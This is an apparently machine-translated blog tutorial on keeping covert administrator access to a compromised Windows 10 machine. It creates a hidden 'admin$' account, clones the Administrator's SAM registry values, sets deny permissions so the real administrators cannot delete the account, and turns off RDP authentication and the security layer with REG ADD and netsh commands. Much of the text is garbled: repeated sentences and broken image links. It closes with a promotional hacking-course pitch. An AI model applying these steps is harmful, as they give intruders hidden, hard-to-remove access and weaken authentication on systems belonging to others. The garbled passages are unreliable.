1. Creation and utilization of hidden users (shadow users) to maintain authority > Use conditions: ① Obtain administrator authority; ② Obtain shell environments such as cmdshell.
System: Windows10 x64 Professional Edition ### Operation steps (take Windows10 as an example): 0×01. First, use cmdshell to add a user with a username , such as: admin user, such as: adminFor users, such as: a d min :123456command:
net user admin$ 123456 /add #add user admin$
net localgroup administrators admin$ /add #Add the admin user to the administrator group administrators! [ ] ( https : / / img − blog . csdnimg . cn / imgconvert / 9130 ff 32 ab 1885 afa 3 e 87 e 680 b 811 a 42 . jpeg ) ∗ ∗ Because the user name is followed by the user added to the administrators group administrators **Because the user name is followed byAdd user to admin group a d mini s t r a t ors ! [ ] ( h ttp s://img−blog.csdnimg.cn/imgconvert/9130ff32ab1885afa3e87e680b811a42.jpeg)∗∗ Because there is (system feature) after the user name , when using the command: net user, the user cannot be seen in the command prompt**
At this time, you can directly log in to 3389 to operate, but the concealment is still not enough, you can In the management tool of the control panel, users and user groups can check the existence of the user, and further operations are required.
0×02. Modify the registry, which cannot be viewed in the command prompt and management tools.**When you use the shell to create a shadow user, you can use this shadow user to open 3389 to log in, and modify the registry on the target machine. Perform data operations to improve the concealment of shadow users. **Open the registry by running regedit and find the item table as shown below:
Selectthe SAM item, set the permissions in **"Edit > Permissions"** on the toolbar, set thepermissions of the Administrators group to full control
and save .
(
Refusing to modify is irreversible. Mistakes will cause big problems. Don’t click on the deny item for full control. This operation is irreversible. Using this idea, we can deny access to the System and Administrators permissions after modifying the registry, which can prevent administrators from deleting This user.
) 
After setting, go back to the main page of the registry and find a hidden subkey under the SAM item, find SAM > Domains > Account > Users and Names
to find the Administrator user and admin respectivelyTwo items of user ∗ ∗ A administrator user's F value (SID): ! [ 161761649 4 6 06 ade 6 e 0432 f 4 a 718 a 36. png ! small ? 1617616494408 ] ( https : / / img − blog . csdnimg .cn / imgconvert / 616 fff 9 f 9 d 308 e 6774 b 46 bfe 00 f 69465. jpeg ) ! [ 161761649 8 6 06 ade 72 a 98 b 0 d 7 e 4 f 5 ce . png ! small ? 37 ] ( https : / / img − blog . csdnimg . cn / imgconvert / 272172858905 cd 3 ba 89 bcd 37 d 96 b 3375. jpeg ) Then copy the binary data in the ∗ ∗ F table ∗ ∗ and find the user under ∗ ∗ U sers The F value (SID) of the two items of the Administrator user of the admin user**:  Then copy the binary data** in **F table** and find the user admin under **Usersuser∗Two items of ∗ A d mini s t r a t or user's F value ( S I D ): ! [ 161761649 4606ade6e0432f4a718a36.png!small?1617616494408](https://img−blog.csdnimg.cn/imgconvert/616fff9f9d308e6774b46bfe00f69465.jpeg) and then∗∗ Binary data in F table∗∗ Copy it down and find∗∗ Edit and pastethe F value of the user ad min under Users , modify it
to the value of Administrator, and save it . **The binary data values under the users item and names item of the admin user: ∗ ∗ ! [ 161761652 4 6 06 ade 8 c 3 c 07 fb 3878675. png ! small ? 1617616524568 ] ( https : / / img − blog . csdnimg.cn / imgconvert / 3 ba 9 b 97 f 563 ed 105 a 5 c 5 db 82 cecc 51 c 6. jpeg ) Convert the 000003 E 9 item under the U sers item (the binary data value under the users item of the admin user and the names item : ** Change 000003 under Users Item E9 (adminThe binary data value under the user's user 's item and name 's item:∗∗ Change the 000003 E 9 item under the Users item ( a d min user 's SID Binary data value) is replaced with the value of the Administrator user, ** after the replacement, export
the admin underItem and 000003 E 9 item (right click to select item to export) ∗ ∗ . ! [ 161761656 1 6 06 adeb 19 adacead 16157. png ! small ? 1617616561978 ] ( https : // img − blog . csdnimg . cn / imgconvert / e 080 a 50 ebd 9340279928 a 89 c 425278 be .jpeg ) after exporting: ! [ 161761656 8 6 06 adeb 8 b 894 ad 5 f 42 e 1 c . png ! small ? 1617616569031 ] ( https : / / img − blog . csdnimg . cn / imgconvert / 13 ab 700 e 28 d 137 dd 08 6 e 1 e 02 b 48 fe 3 d 6. jpeg ) Use cmdshell (administrator authority) to combine the admin item with the 000003E9 item (right-click to select the item to export)**.  After export: ∗∗。 After exporting: ! [ 161761656 8606adeb8b894ad5f42e1c.png!small?1617616569031](https://img−blog.csdnimg.cn/imgco n v er t / 13 ab 700 e 28 d 137 dd 086 e 1 e 02 b 48 f e 3 d 6. j p e g ) Use cm d s h e ll (administrator authority) to delete a d min , after deleting, it is found that the admin user-related items in the registryhave disappeared. At this time, we import the backed-up items and values (double-click to import after exporting or import in the registry) > command: netuseradmin user-related items have disappeared, this When we import the items and values that have been backed up (double-click to import after exporting or import in the registry) > command: net user adminThe user-related items have disappeared. At this time, we import the backed-up items and values (double-click to import after exporting or import in the registry)>Command: n e t u ser a d min /del
Registry import:
import successfully:
After the import is successful, return to the page of viewing users and user groups in the management tool, and find that the user group and user have no adminThis user exists, but in fact we can still use this user's password to log in to RDP, and it can be equivalent to ∗ ∗ A administrator administrator ∗ ∗ to log in. ! [ 161761665 7 6 06 adf 11321 f 4 a 9 b 450 b 5. png ! small ? 1617616657449 ] ( https : / / img − blog . csdnimg . cn / imgconvert / c 07 c 5363 b 25 f 2 e 00 02 e 501994220081 e . jpeg ) Turn on 3389 to log in and find the problem: ! [ 161761667 0 6 06 adf 1 e 9 c 9 f 9 c 05 aca 34. png ! small ? 1617616670961 ] ( https : / / img − blog . csdnimg . cn / imgconvert / 891681 b 4 d 9086 ad 5 f 342 b 0 c 63 d 5 e 2 ff 9. jpeg ) It is found that the user is not authorized. At this time, there is another utilization condition. You need to add admin under the user selection at the bottom right The user exists, but in fact we can still use this user's password to log in to RDP, and it can be equivalent to **Administrator administrator** to log in.  Open 3389 to log in, Problem found: !This user exists, but in fact we can still use this user's password to log in to RDP , and it can be equivalent to∗∗ A d mini s t r a t or administrator∗∗ Perform login operation. ! [ 161761665 7606adf11321f4a9b450b5.png!small?1617616657449](https://img−blog.csdnimg.cn/imgco n v er t / c 07 c 5363 b 25 f 2 e 0002 e 501994220081 e . j p e g ) Open 3389 to log in and find the problem: ! [ 161761667 0606adf1e9c9f9c05aca34.png!small?1617616670961](https://img−blog.csdnimg.cn/imgco n v er t /891681 b 4 d 9086 a d 5 f 342 b 0 c 63 d 5 e 2 ff 9. j pe g ) It is found that the user is not authorized. At this time , there is another utilization condition, which should be in the lower right Under the selected user, add the user name of the ad min user to log in to 3389 normally . 
Successful login after modification:
### 0×01 Details expansion: Then we are based on the remote login interface in actual combat. At this time, we need to expand another permission, userauthentication permission, for authentication of remote connections. **We visually check the difference between the permission on and off with pictures: **On state:
Off state:
focus! ! ! **When the authentication is turned on, we cannot log in to the remote interface without knowing the account password, but after the authentication is turned off, we can enter the remote interface window regardless of whether the account number and password we entered are correct. **How to turn off the authentication mode , we use the following command :
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0> 0 means off, 1 means turning on and off the authentication mode is not enough, you also need to turn off the securitylayer security layer Verification: **Specifically refers to: 0 means use the rdp protocol for identity verification before connecting, and rdp means remote desktop connection, which can be simply understood as turning off verification. 1
means that both ends negotiate for authentication before connecting, and this is the default value. 2 is to use the tls protocol. **Set its parameter to 0, the command is as follows:
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0> In the author’s test, both parameters are turned off at the same time (there is also a parameter that turns off without verification , but it is best to turn off both parameters) to enter the login page of 3389 without entering the correct credentials.The basis of the above operations is that the target computer has enabled remote desktop connection , so we should also understand how to enable remote desktop connection here. Let’s first configure the firewall and set it to allow remote desktop connection
. Command:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP
dir=in localport=3389 action=allownetsh is a Windows network configuration command, advfirewall firewall means advanced firewall settings, add rule is to add a rule, name specifies the rule
name , protocol specifies the protocol, dir specifies whether to go out or inbound, localport specifies the port, and action specifies the action allow to allow.
After setting, let's set the remote desktop connection through the registry and execute the following command:
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer” /v
fDenyTSConnections /t REG_DWORD /D 0 /f After doing the above work, the RDP remote login interface of the server can be opened without entering the correct password, and the remote desktop connection Entering the ip will directly jump to the target lock screen page.
Go to the login page without credential authentication:
Enter the ip on the face connection and it will jump directly to the target lock screen page.
Go to the login page without credential authentication:
### 0×02 Idea extension What is shown here is the creation and utilization of shadow users representing new users. If you encounter a conscious administrator, it is very likely to be found in the registry. If you set irreversible permissions (see The Deny option of access settings full control) can effectively solve the problem of this account being deleted violently, but it will also cause bigger problems later. Using the new shadow user to log in to 3389 will generate data that is easy to be found, and it is necessary to add conditions to 3389 to log in normally (this is the case under Windows 10). Two methods can be expanded here: ① So here we can open the guest account Guest to replace its F value in the registry, open the Guest account, we can log in and reduce some unnecessary attention. ②In the option of adding authorized users, add all known users to prevent administrators from discovering the existence of created shadow users too early.
at last
Share a quick way to learn [Network Security], "maybe" the most comprehensive learning method:
1. Network security theoretical knowledge (2 days)
① Understand the industry-related background, prospects, and determine the development direction.
②Learn laws and regulations related to network security.
③The concept of network security operation.
④Multiple guarantee introduction, guarantee regulations, procedures and norms. (Very important)
2. Penetration testing basics (one week)
①Penetration testing process, classification, standards
②Information collection technology: active/passive information collection, Nmap tools, Google Hacking
③Vulnerability scanning, vulnerability utilization, principles, utilization methods, tools (MSF), Bypass IDS and anti-virus reconnaissance
④ Host attack and defense drill: MS17-010, MS08-067, MS10-046, MS12-20, etc.
3. Operating system basics (one week)
①Common functions and commands of Windows system
②Common functions and commands of Kali Linux system
③Operating system security (system intrusion troubleshooting/system reinforcement basis)
4. Computer network foundation (one week)
①Computer network foundation, protocol and architecture
②Network communication principle, OSI model, data forwarding process
③Common protocol analysis (HTTP, TCP/IP, ARP, etc.)
④Network attack technology and network security defense technology
⑤Web vulnerability principle and defense: active/passive attack, DDOS attack, CVE vulnerability recurrence
5. Basic database operations (2 days)
①Database basics
②SQL language basics
③Database security reinforcement
6. Web penetration (1 week)
①Introduction to HTML, CSS and JavaScript
②OWASP Top10
③Web vulnerability scanning tools
④Web penetration tools: Nmap, BurpSuite, SQLMap, others (chopper, missing scan, etc.)
Congratulations, if you learn this, you can basically work in a network security-related job, such as penetration testing, web penetration, security services, security analysis and other positions; if you learn the security module well, you can also work as a security engineer. The salary range is 6k-15k.
So far, about a month. You've become a "script kiddie". So do you still want to explore further?
Friends who want to get involved in hacking & network security, I have prepared a copy for everyone: 282G, the most complete network security data package on the entire network, for free!
Click [Card at the end of the article] to get it for free
With these foundations, if you want to study in depth, you can refer to the super-detailed learning roadmap below. Learning according to this route is enough to support you to become an excellent intermediate and senior network security engineer:
[High-definition learning roadmap or XMIND file (click the card at the end of the article to get it)]
There are also some video and document resources collected in the study, which can be taken by yourself if necessary:
supporting videos for each growth path corresponding to the section:
of course, in addition to supporting videos, various documents, books, materials & tools are also organized for you , and has helped everyone to classify.
Due to the limited space, only part of the information is displayed. If you need it, you can [click the card below to get it for free]